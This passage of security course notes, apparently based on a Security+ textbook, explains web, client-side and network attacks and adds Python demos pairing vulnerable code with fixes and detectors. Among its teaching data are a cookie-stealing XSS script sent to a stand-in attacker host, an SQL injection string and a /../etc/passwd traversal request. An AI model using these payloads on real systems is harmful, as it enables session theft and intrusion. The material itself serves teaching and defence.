Objectives
- List and explain the different types of Web application attacks
- Define client-side attacks
- Explain how a buffer overflow attack works
- List different types of denial of service attacks
- Describe interception and poisoning attacks
Application Attacks
The number of attacks aimed at applications continues to grow: Web application attacks, client-side attacks, buffer overflow attacks and zero day attacks. A zero day attack exploits a vulnerability that is not yet publicly known, so no patch exists for it.
Web applications are an essential element of organizations today. The traditional approaches to securing them fall short:
- Hardening the Web server: hardening the operating system and system services protects against other attacks, e.g. DDoS, but does not prevent attacks against the application server itself.
- Protecting the network: network security devices can block the traditional attacks but not attacks on the Web application server, because they ignore the content of the HTTP traffic.
Common Web application attacks: cross-site scripting (XSS, which in effect injects JavaScript), SQL injection, XML injection, and command injection / directory traversal.
Cross-site scripting (XSS) is an attack aimed at the clients of a Web application, not a direct attack on the Web application server (for example, to deface it). The Web browser executes any code the Web site sends it, whether JavaScript, HTML or Adobe Flash, so code an attacker manages to place in the site's pages runs in the victim's browser.
Figure 3-4 Bookmark page that accepts user input without validating it and provides an unencoded response (Cengage Learning 2012)
In the example below, a Web application lets friends share their favorite bookmarks. The user enters a name, a description and the URL of a bookmark; the application then shows a personalized "Thank you" screen in which the name the user typed is inserted directly into the page's code. An attacker can exploit this in an XSS attack: the attacker enters malicious code into the Name field, and that code is executed on the victim's machine when the victim is tricked into clicking a link to the page that carries it. An example of such a malicious link is
http://fakesite.com/login.asp?serviceName=fakesite.comaccess&templatename=pro_sel.forte&source=fakeimg.srcc=http://www.attacker_site.com/
where the final parameter points to the attacker's Web page.
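As an added example (not code from the textbook), a minimal Python model of the bookmark page above. `vulnerable_thank_you` splices the Name field into the HTML exactly as the page does; `safe_thank_you` HTML-encodes it first. `craft_link` and `handle_request` simulate the reflected variant, where the payload travels in the query string of the link the victim clicks. The payload, the attacker hostname and the URL `http://bookmarks.example/thanks` are constructed for the demonstration.

```python
import html
from urllib.parse import urlencode, urlsplit, parse_qs

# Constructed attacker input for the Name field: a script that ships the
# victim's cookie to the attacker's site (both hostnames are made up).
MALICIOUS_NAME = ('<script>document.location="http://www.attacker_site.com/?c="'
                  '+document.cookie</script>')


def vulnerable_thank_you(name):
    """Thank-you page built the way the bookmark app does it: the Name value
    is spliced into the HTML without any encoding."""
    return "<html><body><h1>Thank you, " + name + "!</h1></body></html>"


def safe_thank_you(name):
    """Same page with the user-controlled value HTML-encoded first, so any
    markup in it is rendered as literal text instead of being executed."""
    return ("<html><body><h1>Thank you, " + html.escape(name, quote=True)
            + "!</h1></body></html>")


def craft_link(base_url, name):
    """The link an attacker would send a victim: the payload rides in the
    query string, URL-encoded so the browser carries it intact."""
    return base_url + "?" + urlencode({"name": name})


def handle_request(url, render):
    """Simulates the server handling GET /thanks?name=...: it reads the
    parameter back out of the URL and hands it to the page builder."""
    params = parse_qs(urlsplit(url).query)
    return render(params.get("name", [""])[0])


def contains_live_script(page):
    """Crude success check: does the rendered page contain a real <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    link = craft_link("http://bookmarks.example/thanks", MALICIOUS_NAME)
    print(link)
    print(handle_request(link, vulnerable_thank_you))  # script tag reaches the page
    print(handle_request(link, safe_thank_you))        # shows up as &lt;script&gt;
```

Encoding at the point where the value is written into the page is the fix the figure caption hints at ("unencoded response"); validating the Name field on input alone is weaker, because the same value may later be written into a different context.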
SQL Injection
The attacker types into the email field, and the application pastes that text straight into an SQL statement that is then processed by the database. Instead of entering a user name or email address, the attacker enters the text
whatever' or 'a'='a
so the statement the database sees becomes
SELECT fieldlist FROM table WHERE field = 'whatever' or 'a'='a'
Here "whatever" can be any meaningless value. Because the two conditions are joined by OR, the WHERE clause is satisfied when either of them is true, and 'a'='a' is always true. The statement is therefore equivalent to SELECT fieldlist FROM table, and the email addresses of all users are returned.
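The query above carried out against a throwaway SQLite database, as an added example that is not from the textbook. `vulnerable_lookup` builds the SQL by string concatenation, so the payload turns the WHERE clause into a tautology and every row comes back; `safe_lookup` sends the same input as a bound parameter and the database treats it as an ordinary string. The table, the users and their addresses are constructed for the demo; the same concatenation bug applies to any attacker-controlled input, including HTTP header values.

```python
import sqlite3


def make_db():
    """Constructed sample user table (names and addresses are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [
        ("alice", "alice@example.com"),
        ("bob", "bob@example.com"),
        ("carol", "carol@example.com"),
    ])
    return conn


def vulnerable_lookup(conn, email_field):
    """The application's query built by string concatenation: whatever the
    user typed in the email field becomes part of the SQL text itself."""
    sql = "SELECT email FROM users WHERE email = '" + email_field + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, email_field):
    """Same query with a bound parameter: the driver passes the input as a
    value, so quotes and keywords inside it never reach the SQL parser."""
    sql = "SELECT email FROM users WHERE email = ?"
    return [row[0] for row in conn.execute(sql, (email_field,))]


# The attacker's entry for the email field, from the text above.
PAYLOAD = "whatever' or 'a'='a"


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, PAYLOAD))      # every address in the table
    print(safe_lookup(db, PAYLOAD))            # nothing equals that literal string
    print(safe_lookup(db, "bob@example.com"))  # normal use still works
```

The parameterized form is the fix: the query's structure is fixed before the input is supplied, so no input can change which rows the WHERE clause selects.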
XML Injection
A markup language is a method of adding annotations (tags) to text that describe how the text is to be processed or displayed. HTML uses such tags to describe how a page is displayed; XML uses tags to carry data rather than to describe its presentation.
XML injection attack: similar to an SQL injection attack. The attacker discovers a Web site that does not filter user data and injects XML tags and data into the database.
XPath injection: a specific type of XML injection attack that attempts to exploit XML Path Language (XPath) queries, the expressions used to select nodes from an XML document.
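An added example (not from the textbook) of the XML injection defined above: a user record is stored by pasting the submitted fields between tags, so input that contains tags changes the structure of the stored document, here adding an extra <role> element. The safe builder goes through the XML API, which escapes the characters <, > and & in character data when it serializes the tree. The field values are constructed.

```python
import xml.etree.ElementTree as ET

# Constructed attacker input for the name field: it closes the <name>
# element, smuggles in an extra <role> element, and reopens <name>.
INJECTED_NAME = "mallory</name><role>admin</role><name>mallory"


def vulnerable_record(name, email):
    """Stores a user by pasting the fields between tags, the 'does not filter
    user data' case from the text: tags in the input become structure."""
    return ("<user><name>" + name + "</name><email>" + email
            + "</email><role>user</role></user>")


def safe_record(name, email):
    """Builds the same record through the XML API: the values are character
    data, and '<', '>' and '&' are escaped when the tree is serialized."""
    user = ET.Element("user")
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "email").text = email
    ET.SubElement(user, "role").text = "user"
    return ET.tostring(user, encoding="unicode")


def roles(record):
    """Parses a stored record and returns every role it grants."""
    return [r.text for r in ET.fromstring(record).findall("role")]


def names(record):
    """Returns the text of every <name> element in a stored record."""
    return [n.text for n in ET.fromstring(record).findall("name")]


if __name__ == "__main__":
    print(roles(vulnerable_record(INJECTED_NAME, "m@example.com")))  # admin and user
    print(roles(safe_record(INJECTED_NAME, "m@example.com")))        # user only
```

The vulnerable record still parses as well-formed XML, which is why a downstream consumer that trusts the store grants the injected role.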
Directory traversal: Web server users are typically restricted to the site's root directory. Users may be able to access subdirectories, but should not be able to reach directories above the root (for example by using ../ sequences that climb out of it). Command injection: the same flaw can be used to enter text-based commands that the server executes. On Linux, passwd contains user account information and is a common target of such requests.
Security+ Guide to Network Security Fundamentals, Fourth Edition
Directory traversal takes advantage of a software vulnerability: the attacker moves from the root directory into restricted directories.
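An added example (not from the textbook) of the traversal above, run against a constructed directory tree in a temporary folder: `serve_naive` joins the request path onto the document root without any check, so a request for /../etc/passwd escapes it, while `resolve_under_root` canonicalizes the result and refuses anything that does not lie under the root. The file contents, including the passwd line, are fake.

```python
import os
import tempfile


def make_site():
    """Constructed sample tree: <tmp>/www is the document root and
    <tmp>/etc/passwd stands in for the system file outside it."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "www", "images"))
    os.makedirs(os.path.join(base, "etc"))
    with open(os.path.join(base, "www", "index.html"), "w") as f:
        f.write("<h1>home</h1>")
    with open(os.path.join(base, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed line, not a real file
    return os.path.join(base, "www")


def serve_naive(doc_root, request_path):
    """Vulnerable handler: joins the request path onto the root and reads it.
    '..' components are honoured, so the request can climb out of the root."""
    with open(os.path.join(doc_root, request_path.lstrip("/"))) as f:
        return f.read()


def resolve_under_root(doc_root, request_path):
    """Canonicalizes the requested path (collapsing '..' and symlinks) and
    refuses it unless the result is the root itself or lies below it."""
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, request_path.lstrip("/")))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise PermissionError("request escapes the document root: " + request_path)
    return candidate


def is_allowed(doc_root, request_path):
    """True if the request maps to a file inside the document root."""
    try:
        resolve_under_root(doc_root, request_path)
        return True
    except PermissionError:
        return False


def serve_safe(doc_root, request_path):
    """Hardened handler: only opens paths that passed the containment check."""
    with open(resolve_under_root(doc_root, request_path)) as f:
        return f.read()


if __name__ == "__main__":
    root = make_site()
    print(serve_naive(root, "/../etc/passwd"))   # leaks the file outside the root
    print(is_allowed(root, "/../etc/passwd"))    # False
```

Checking with realpath on both sides also catches a symlink inside the root that points outside it, which a purely textual check for ".." would miss.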
Client-Side Attacks
Web application attacks are server-side attacks; client-side attacks instead target vulnerabilities in client applications. They occur when a client interacts with a compromised server: the client initiates the connection to the server, and that connection can result in an attack on the client.
Drive-by download: the client computer is compromised simply by viewing a Web page. Attackers inject content into a vulnerable Web server and so gain control over what it serves. To avoid detection, attackers embed a second HTML document inside the main document (typically in an IFrame too small to notice); the client's browser downloads the malicious script, which instructs the computer to download malware.
Header manipulation: the HTTP header contains fields that characterize the data being transmitted. Headers can originate from the Web browser, and although browsers do not normally allow a user to modify them, a short program written by the attacker can. Examples:
- Referer: identifies the site the request came from. An attacker can modify this field to hide the fact that the request came from another site, so a modified Web page hosted on the attacker's computer appears to come from the expected site.
- Accept-language: some Web applications pass the contents of this field directly to a database; an attacker could inject an SQL command by modifying this header.
Cookies: Web sites use cookies to identify repeat visitors. Examples of information stored in a cookie: a travel Web site may store the user's travel itinerary, or personal information the user provided when visiting the site. Types of cookies:
- First-party cookie: created by the Web site the user is currently visiting.
- Third-party cookie: placed by a site's advertisers to record user preferences.
- Session cookie: stored in RAM and expires when the browser is closed.
- Persistent cookie: recorded on the computer's hard drive and kept until it expires or is deleted.
- Secure cookie: used only when the browser visits the server over a secure connection, so it is always sent encrypted.
- Flash cookie: uses more memory than a traditional cookie and cannot be deleted through the browser's configuration settings. See Project 3-6 to change Flash cookie settings.
Cookies can be exploited by attackers: they are used to tailor advertising, and a cookie can be stolen and used to impersonate the user.
Session hijacking: the attacker uses a stolen session cookie or token to impersonate the user and take over the session.
Malicious add-ons: browser extensions (add-ons) provide multimedia or interactive Web content. ActiveX add-ons in particular have several security concerns.
Buffer Overflow Attacks
A buffer overflow attempts to store data in RAM beyond the boundaries of a fixed-length storage buffer. The data overflows into adjacent memory locations, which may cause the computer to stop functioning. An attacker who controls the overflowing data can overwrite the function's return address and redirect execution to malicious code of the attacker's choosing.
Network Attacks
Ping flood attack: the ping utility is used to send a large number of ICMP echo request messages, overwhelming the Web server.
Smurf attack: a ping request is sent with its originating address changed to the target's, so it appears as if the target computer is asking for a response from all computers on the network; the target is then flooded with the replies.
Network Attacks (contd.)
SYN flood attack: takes advantage of the procedure for initiating a TCP session (the three-way handshake) by sending many SYN requests and never completing them, leaving the server holding half-open connections.
Distributed denial of service (DDoS) attack: uses many zombie computers in a botnet to flood a device with requests. It is virtually impossible to identify and block the source of the attack.
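Added example (not from the textbook): detection logic for the attacks above, run over a constructed packet-summary log with one packet per line (time, source, destination, protocol, TCP flags or ICMP type). A SYN flood shows up as SYNs from a source that are never followed by that source's ACK; a ping flood as many echo requests from one source to one destination; a smurf as echo requests whose destination is a directed-broadcast address, where the "source" is the spoofed victim. The thresholds and the .255 broadcast heuristic are assumptions for the demo.

```python
from collections import Counter

# Constructed packet-summary log (not a real capture):
# time  source  destination  protocol  TCP-flags-or-ICMP-type
SAMPLE_LOG = """\
0.001 10.0.0.5 192.168.1.10 TCP SYN
0.002 10.0.0.5 192.168.1.10 TCP SYN
0.003 10.0.0.5 192.168.1.10 TCP SYN
0.004 10.0.0.5 192.168.1.10 TCP SYN
0.005 10.0.0.5 192.168.1.10 TCP SYN
0.006 10.0.0.5 192.168.1.10 TCP SYN
0.010 10.0.0.7 192.168.1.10 TCP SYN
0.011 192.168.1.10 10.0.0.7 TCP SYN-ACK
0.012 10.0.0.7 192.168.1.10 TCP ACK
0.020 10.0.0.8 192.168.1.10 ICMP echo-request
0.021 10.0.0.8 192.168.1.10 ICMP echo-request
0.022 10.0.0.8 192.168.1.10 ICMP echo-request
0.023 10.0.0.8 192.168.1.10 ICMP echo-request
0.024 10.0.0.8 192.168.1.10 ICMP echo-request
0.030 192.168.1.10 192.168.1.255 ICMP echo-request
0.031 192.168.1.10 192.168.1.255 ICMP echo-request
0.032 192.168.1.10 192.168.1.255 ICMP echo-request
0.033 192.168.1.20 192.168.1.10 ICMP echo-reply
0.034 192.168.1.30 192.168.1.10 ICMP echo-reply
"""


def parse(log):
    """Turns the summary lines into (time, src, dst, proto, info) tuples."""
    pkts = []
    for line in log.splitlines():
        if line.strip():
            ts, src, dst, proto, info = line.split()
            pkts.append((float(ts), src, dst, proto, info))
    return pkts


def syn_flood_suspects(pkts, threshold=5):
    """(src, dst) pairs with more half-open connections than the threshold:
    each bare SYN opens one; the client's later ACK would close it."""
    half_open = Counter()
    for _, src, dst, proto, info in pkts:
        if proto != "TCP":
            continue
        if info == "SYN":
            half_open[(src, dst)] += 1
        elif info == "ACK":
            half_open[(src, dst)] -= 1
    return {pair: n for pair, n in half_open.items() if n > threshold}


def ping_flood_suspects(pkts, threshold=4):
    """(src, dst) pairs sending more echo requests than the threshold."""
    echo = Counter((src, dst) for _, src, dst, proto, info in pkts
                   if proto == "ICMP" and info == "echo-request")
    return {pair: n for pair, n in echo.items() if n > threshold}


def smurf_suspects(pkts):
    """Echo requests addressed to a directed-broadcast address (assumed here
    to end in .255). The 'source' is the spoofed victim that gets every reply."""
    return {(src, dst) for _, src, dst, proto, info in pkts
            if proto == "ICMP" and info == "echo-request" and dst.endswith(".255")}


if __name__ == "__main__":
    pk = parse(SAMPLE_LOG)
    print(syn_flood_suspects(pk), ping_flood_suspects(pk), smurf_suspects(pk))
```

The legitimate client 10.0.0.7 completes its handshake and so nets out to zero half-open connections, which is what separates it from the flooder sending the same SYNs.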
Interception
Man-in-the-middle attack: interception of a legitimate communication, forging a fictitious response to the sender. A passive attack records the transmitted data; an active attack alters the contents of the transmission before sending it on to the recipient.
Replay attack: similar to a man-in-the-middle attack, except that the attacker captures a legitimate message and resends it later rather than altering it in transit. Example: the attacker captures a message sent to a server and later sends that original, valid message to the server, which establishes a trust relationship between the attacker and the server.
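Added example (not from the textbook) of the replay described above, simulating both sides in Python. Messages carry an HMAC under a shared key; the naive server verifies only the MAC, and since a replayed message is genuine it is accepted a second time. The replay-resistant server additionally requires a timestamp within a window and a nonce it has not seen before. The key, message bodies, nonces and the 30-second window are constructed for the demo.

```python
import hmac
import hashlib

SHARED_KEY = b"constructed-shared-key"  # assumption: both ends already hold this key


def _tag(key, body, nonce, ts):
    """HMAC over nonce, timestamp and body so none of them can be changed."""
    data = nonce.encode() + b"|" + str(ts).encode() + b"|" + body
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def sign(key, body, nonce, ts):
    """Client side: builds an authenticated message."""
    return {"body": body, "nonce": nonce, "ts": ts, "mac": _tag(key, body, nonce, ts)}


def mac_is_valid(key, msg):
    expected = _tag(key, msg["body"], msg["nonce"], msg["ts"])
    return hmac.compare_digest(expected, msg["mac"])


class NaiveServer:
    """Checks only that the MAC is genuine. A captured message is genuine,
    so playing it back is accepted exactly like the original."""
    def __init__(self, key):
        self.key = key

    def accept(self, msg, now):
        return mac_is_valid(self.key, msg)


class ReplayResistantServer:
    """Also requires a fresh timestamp and a never-before-seen nonce, so an
    intercepted message cannot be played back, even within the window."""
    def __init__(self, key, window=30):
        self.key = key
        self.window = window
        self.seen = {}  # nonce -> timestamp, pruned once outside the window

    def accept(self, msg, now):
        if not mac_is_valid(self.key, msg):
            return False                      # tampered or forged
        if abs(now - msg["ts"]) > self.window:
            return False                      # stale: a late replay or clock skew
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if msg["nonce"] in self.seen:
            return False                      # replay inside the window
        self.seen[msg["nonce"]] = msg["ts"]
        return True


if __name__ == "__main__":
    captured = sign(SHARED_KEY, b"transfer 100 to attacker", "nonce-1", 1000)
    naive, hardened = NaiveServer(SHARED_KEY), ReplayResistantServer(SHARED_KEY)
    print(naive.accept(captured, 1000), naive.accept(captured, 1005))        # True True
    print(hardened.accept(captured, 1000), hardened.accept(captured, 1005))  # True False
```

The window bounds how long nonces must be remembered; without a timestamp the server would have to keep every nonce it ever saw to stop a replay.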
Poisoning
ARP poisoning: the attacker sends forged ARP replies so that a valid MAC address in a victim's ARP cache is replaced with a fraudulent one (usually the attacker's own), and traffic meant for another host is delivered to the attacker instead.
DNS poisoning: the Domain Name System is the current basis for resolving names to IP addresses. DNS poisoning substitutes fraudulent addresses for the valid DNS addresses in order to redirect the computer to another device.
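Added example (not from the textbook): checks for the ARP poisoning described above, run over constructed ARP-reply observations from one LAN segment. `mac_changes` reports IPs whose advertised MAC changed after it was first learned, `macs_claiming_many` reports a MAC answering for more than one IP (a poisoner typically claims both the gateway and the victim), and `check_against_baseline` compares observations with a known-good table, the static-ARP approach. All addresses are made up.

```python
from collections import defaultdict

# Constructed ARP reply observations from one LAN segment (made-up addresses):
# time  ip-claimed  mac-answering
ARP_LOG = """\
1 192.168.1.1 aa:bb:cc:00:00:01
2 192.168.1.20 aa:bb:cc:00:00:20
3 192.168.1.1 aa:bb:cc:00:00:01
4 192.168.1.1 de:ad:be:ef:00:99
5 192.168.1.20 de:ad:be:ef:00:99
6 192.168.1.30 aa:bb:cc:00:00:30
"""


def parse_arp(log):
    """Turns the lines into (time, ip, mac) tuples with MACs normalized."""
    entries = []
    for line in log.splitlines():
        if line.strip():
            ts, ip, mac = line.split()
            entries.append((int(ts), ip, mac.lower()))
    return entries


def mac_changes(entries):
    """IPs whose advertised MAC differs from the one first learned for them,
    mapped to (original MAC, new MAC). A sudden change for the gateway's IP
    is the classic sign of poisoning."""
    first, changed = {}, {}
    for _, ip, mac in entries:
        if ip not in first:
            first[ip] = mac
        elif mac != first[ip]:
            changed[ip] = (first[ip], mac)
    return changed


def macs_claiming_many(entries):
    """MACs that answered for more than one IP: a poisoner claims both the
    gateway and the victim so that it can sit between them."""
    ips = defaultdict(set)
    for _, ip, mac in entries:
        ips[mac].add(ip)
    return {mac: sorted(v) for mac, v in ips.items() if len(v) > 1}


def check_against_baseline(entries, baseline):
    """Static-ARP style check: every observed binding must match the known-good
    table (assumed to be maintained by the administrator)."""
    return [(ip, mac) for _, ip, mac in entries if baseline.get(ip) != mac]


if __name__ == "__main__":
    e = parse_arp(ARP_LOG)
    print(mac_changes(e))
    print(macs_claiming_many(e))
```

The same idea transfers to the DNS poisoning above: compare the answers a resolver hands back with answers from a trusted source and flag any name whose address changed.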
Privilege escalation: exploiting a software vulnerability to gain access to restricted data. Either a lower-privilege user accesses functions restricted to higher-privilege users, or a user with restricted privilege accesses the restricted data of a different user at the same privilege level.
Transitive access: an attack involving a third party to gain access rights. It has to do with whose credentials should be used when one service accesses another on a user's behalf.
Summary
Web application flaws are exploited through normal communication channels. An XSS attack uses Web sites that accept user input without validating it; SQL injection uses malicious SQL statements entered through user input.
Summary (contd.)
Session hijacking: the attacker impersonates a user by taking over the user's session. A denial of service attack attempts to overwhelm a system so that it cannot perform its normal functions. In ARP and DNS poisoning, valid addresses are replaced with fraudulent addresses. Access rights and privileges may also be